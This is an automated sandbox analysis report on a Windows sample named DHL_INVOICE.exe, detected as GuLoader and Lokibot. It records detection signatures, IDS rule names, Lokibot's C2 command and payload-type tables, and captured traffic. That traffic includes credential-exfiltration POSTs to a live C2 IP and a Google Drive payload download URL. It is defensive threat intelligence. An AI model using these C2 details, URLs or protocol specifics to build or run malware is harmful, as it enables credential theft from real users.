Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DHL_INVOICE.exe

Overview

General Information

Sample Name:DHL_INVOICE.exe
Analysis ID:1289545
MD5:c15b81d99f8367b4c4e8b4c2244f3df6
SHA1:cb8277dc29360515d91a0228c41de01c22a75608
SHA256:09ec94c4b0172ceb189b7e15b36d82e70fef89a19d20856b5c60211a01693d48
Infos:

Detection

GuLoader, Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Yara detected Lokibot
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Yara detected GuLoader
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Initial sample is a PE file and has a suspicious name
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Internet Provider seen in connection with other malware
Detected potential crypto function
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Enables debug privileges
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Found evaded block containing many API calls
PE / OLE file has an invalid certificate
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64native
  • DHL_INVOICE.exe (PID: 10072 cmdline: C:\Users\user\Desktop\DHL_INVOICE.exe MD5: C15B81D99F8367B4C4E8B4C2244F3DF6)
    • DHL_INVOICE.exe (PID: 9296 cmdline: C:\Users\user\Desktop\DHL_INVOICE.exe MD5: C15B81D99F8367B4C4E8B4C2244F3DF6)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
Loki Password Stealer (PWS), LokiBot"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2
  • SWEED
  • The Gorgon Group
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws
No configs have been found
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1084543933.00000000047F5000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      Process Memory Space: DHL_INVOICE.exe PID: 9296JoeSecurity_Lokibot_1Yara detected LokibotJoe Security
        No Sigma rule has matched
        Timestamp:192.168.11.20216.128.145.19649723802024312 08/10/23-19:20:55.548476
        SID:2024312
        Source Port:49723
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.20216.128.145.19649723802021641 08/10/23-19:20:55.548476
        SID:2021641
        Source Port:49723
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.20216.128.145.19649723802024317 08/10/23-19:20:55.548476
        SID:2024317
        Source Port:49723
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.20216.128.145.19649722802024312 08/10/23-19:20:54.302237
        SID:2024312
        Source Port:49722
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.20216.128.145.19649724802024318 08/10/23-19:20:56.869971
        SID:2024318
        Source Port:49724
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.20216.128.145.19649724802021641 08/10/23-19:20:56.869971
        SID:2021641
        Source Port:49724
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.20216.128.145.19649722802021641 08/10/23-19:20:54.302237
        SID:2021641
        Source Port:49722
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.20216.128.145.19649724802024313 08/10/23-19:20:56.869971
        SID:2024313
        Source Port:49724
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.20216.128.145.19649722802024317 08/10/23-19:20:54.302237
        SID:2024317
        Source Port:49722
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: DHL_INVOICE.exeVirustotal: Detection: 26%Perma Link
        Source: DHL_INVOICE.exeReversingLabs: Detection: 31%
        Source: http://216.128.145.196/~wellseconds/?p=9651Avira URL Cloud: Label: phishing
        Source: http://216-128-145-196.cprapid.com/~wellseconds/wp-json/Avira URL Cloud: Label: phishing
        Source: http://216-128-145-196.cprapid.com/~wellseconds/feed/Avira URL Cloud: Label: phishing
        Source: http://216-128-145-196.cprapid.com/~wellseconds/comments/feed/Avira URL Cloud: Label: phishing
        Source: C:\Users\user\AppData\Roaming\5D4ACB\B73EF6.exeReversingLabs: Detection: 31%
        Source: DHL_INVOICE.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.11.20:49720 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 142.250.185.129:443 -> 192.168.11.20:49721 version: TLS 1.2
        Source: DHL_INVOICE.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: mshtml.pdb source: DHL_INVOICE.exe, 00000002.00000001.936320561.0000000000649000.00000020.00000001.01000000.00000005.sdmp
        Source: Binary string: mshtml.pdbUGP source: DHL_INVOICE.exe, 00000002.00000001.936320561.0000000000649000.00000020.00000001.01000000.00000005.sdmp
        Source: C:\Users\user\Desktop\DHL_INVOICE.exeCode function: 0_2_00406719 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00406719
        Source: C:\Users\user\Desktop\DHL_INVOICE.exeCode function: 0_2_004065CF FindFirstFileW,FindClose,0_2_004065CF
        Source: C:\Users\user\Desktop\DHL_INVOICE.exeCode function: 0_2_00402B75 FindFirstFileW,0_2_00402B75

        Networking

        barindex
        Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.11.20:49722 -> 216.128.145.196:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49722 -> 216.128.145.196:80
        Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.11.20:49722 -> 216.128.145.196:80
        Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.11.20:49723 -> 216.128.145.196:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49723 -> 216.128.145.196:80
        Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.11.20:49723 -> 216.128.145.196:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49724 -> 216.128.145.196:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49724 -> 216.128.145.196:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49724 -> 216.128.145.196:80
        Source: Joe Sandbox ViewASN Name: AS-CHOOPAUS AS-CHOOPAUS
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: Joe Sandbox ViewIP Address: 216.128.145.196 216.128.145.196
        Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1UU5wPEottrqzBfqrgPY_IUZEFQhT0Vgv HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: drive.google.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/n391lbrd9ce1mgklk8prf9qvpmeqekqt/1691688000000/04164905018868905653/*/1UU5wPEottrqzBfqrgPY_IUZEFQhT0Vgv?e=download&uuid=ab3efce8-7fc0-461d-8cd6-5289dc939099 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Cache-Control: no-cacheHost: doc-08-3o-docs.googleusercontent.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: POST /~wellseconds/?p=9651 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 216.128.145.196Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A0B49A50Content-Length: 178Connection: close
        Source: global trafficHTTP traffic detected: POST /~wellseconds/?p=9651 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 216.128.145.196Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A0B49A50Content-Length: 178Connection: close
        Source: global trafficHTTP traffic detected: POST /~wellseconds/?p=9651 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 216.128.145.196Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A0B49A50Content-Length: 151Connection: close
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
        Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Aug 2023 17:20:54 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://216-128-145-196.cprapid.com/~wellseconds/wp-json/>; rel="https://api.w.org/"Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 65 6c 6c 20 53 65 63 6f 6e 64 73 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 32 31 36 2d 31 32 38 2d 31 34 35 2d 31 39 36 2e 63 70 72 61 70 69 64 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 65 6c 6c 20 53 65 63 6f 6e 64 73 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 32 31 36 2d 31 32 38 2d 31 34 35 2d 31 39 36 2e 63 70 72 61 70 69 64 2e 63 6f 6d 2f 7e 77 65 6c 6c 73 65 63 6f 6e 64 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 65 6c 6c 20 53 65 63 6f 6e 64 73 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 32 31 36 2d 31 32 38 2d 31 34 35 2d 31 39 36 2e 63 70 72 61 70 69 64 2e 63 6f 6d 2f 7e 77 65 6c 6c 73 65 63 6f 6e 64 73 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 34 2e 30 2e 30 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 34 2e 30 2e 30 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 32 31 36 2d 31 32 38 2d 31 34 35 2d 31 39 36 2e 63 70 72 61 70 69 64 2e 63 6f 6d 5c 2f 7e 77 65 6c 6c 73 65
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Aug 2023 17:20:55 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://216-128-145-196.cprapid.com/~wellseconds/wp-json/>; rel="https://api.w.org/"Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 65 6c 6c 20 53 65 63 6f 6e 64 73 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 32 31 36 2d 31 32 38 2d 31 34 35 2d 31 39 36 2e 63 70 72 61 70 69 64 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 65 6c 6c 20 53 65 63 6f 6e 64 73 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 32 31 36 2d 31 32 38 2d 31 34 35 2d 31 39 36 2e 63 70 72 61 70 69 64 2e 63 6f 6d 2f 7e 77 65 6c 6c 73 65 63 6f 6e 64 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 65 6c 6c 20 53 65 63 6f 6e 64 73 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 32 31 36 2d 31 32 38 2d 31 34 35 2d 31 39 36 2e 63 70 72 61 70 69 64 2e 63 6f 6d 2f 7e 77 65 6c 6c 73 65 63 6f 6e 64 73 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 34 2e 30 2e 30 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 34 2e 30 2e 30 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 32 31 36 2d 31 32 38 2d 31 34 35 2d 31 39 36 2e 63 70 72 61 70 69 64 2e 63 6f 6d 5c 2f 7e 77 65 6c 6c 73 65
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Aug 2023 17:20:56 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://216-128-145-196.cprapid.com/~wellseconds/wp-json/>; rel="https://api.w.org/"Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 65 6c 6c 20 53 65 63 6f 6e 64 73 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 32 31 36 2d 31 32 38 2d 31 34 35 2d 31 39 36 2e 63 70 72 61 70 69 64 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 65 6c 6c 20 53 65 63 6f 6e 64 73 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 32 31 36 2d 31 32 38 2d 31 34 35 2d 31 39 36 2e 63 70 72 61 70 69 64 2e 63 6f 6d 2f 7e 77 65 6c 6c 73 65 63 6f 6e 64 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 65 6c 6c 20 53 65 63 6f 6e 64 73 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 32 31 36 2d 31 32 38 2d 31 34 35 2d 31 39 36 2e 63 70 72 61 70 69 64 2e 63 6f 6d 2f 7e 77 65 6c 6c 73 65 63 6f 6e 64 73 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 34 2e 30 2e 30 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 34 2e 30 2e 30 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 32 31 36 2d 31 32 38 2d 31 34 35 2d 31 39 36 2e 63 70 72 61 70 69 64 2e 63 6f 6d 5c 2f 7e 77 65 6c 6c 73 65
        Source: unknownTCP traffic detected without corresponding DNS query: 216.128.145.196
        Source: unknownTCP traffic detected without corresponding DNS query: 216.128.145.196
        Source: unknownTCP traffic detected without corresponding DNS query: 216.128.145.196
        Source: unknownTCP traffic detected without corresponding DNS query: 216.128.145.196
        Source: unknownTCP traffic detected without corresponding DNS query: 216.128.145.196
        Source: unknownTCP traffic detected without corresponding DNS query: 216.128.145.196
        Source: unknownTCP traffic detected without corresponding DNS query: 216.128.145.196
        Source: unknownTCP traffic detected without corresponding DNS query: 216.128.145.196
        Source: unknownTCP traffic detected without corresponding DNS query: 216.128.145.196
        Source: unknownTCP traffic detected without corresponding DNS query: 216.128.145.196
        Source: unknownTCP traffic detected without corresponding DNS query: 216.128.145.196
        Source: unknownTCP traffic detected without corresponding DNS query: 216.128.145.196
        Source: unknownTCP traffic detected without corresponding DNS query: 216.128.145.196
        Source: unknownTCP traffic detected without corresponding DNS query: 216.128.145.196
        Source: unknownTCP traffic detected without corresponding DNS query: 216.128.145.196
        Source: unknownTCP traffic detected without corresponding DNS query: 216.128.145.196
        Source: unknownTCP traffic detected without corresponding DNS query: 216.128.145.196
        Source: unknownTCP traffic detected without corresponding DNS query: 216.128.145.196
        Source: unknownTCP traffic detected without corresponding DNS query: 216.128.145.196
        Source: unknownTCP traffic detected without corresponding DNS query: 216.128.145.196
        Source: unknownTCP traffic detected without corresponding DNS query: 216.128.145.196
        Source: unknownTCP traffic detected without corresponding DNS query: 216.128.145.196
        Source: unknownTCP traffic detected without corresponding DNS query: 216.128.145.196
        Source: unknownTCP traffic detected without corresponding DNS query: 216.128.145.196
        Source: unknownTCP traffic detected without corresponding DNS query: 216.128.145.196
        Source: unknownTCP traffic detected without corresponding DNS query: 216.128.145.196
        Source: unknownTCP traffic detected without corresponding DNS query: 216.128.145.196
        Source: unknownTCP traffic detected without corresponding DNS query: 216.128.145.196
        Source: unknownTCP traffic detected without corresponding DNS query: 216.128.145.196
        Source: unknownTCP traffic detected without corresponding DNS query: 216.128.145.196
        Source: unknownTCP traffic detected without corresponding DNS query: 216.128.145.196
        Source: unknownTCP traffic detected without corresponding DNS query: 216.128.145.196
        Source: unknownTCP traffic detected without corresponding DNS query: 216.128.145.196
        Source: unknownTCP traffic detected without corresponding DNS query: 216.128.145.196
        Source: unknownTCP traffic detected without corresponding DNS query: 216.128.145.196
        Source: unknownTCP traffic detected without corresponding DNS query: 216.128.145.196
        Source: unknownTCP traffic detected without corresponding DNS query: 216.128.145.196
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: DHL_INVOICE.exe, 00000002.00000002.1143341103.0000000003215000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://216-128-145-196.cprapid.com/~wellseconds/comments/feed/
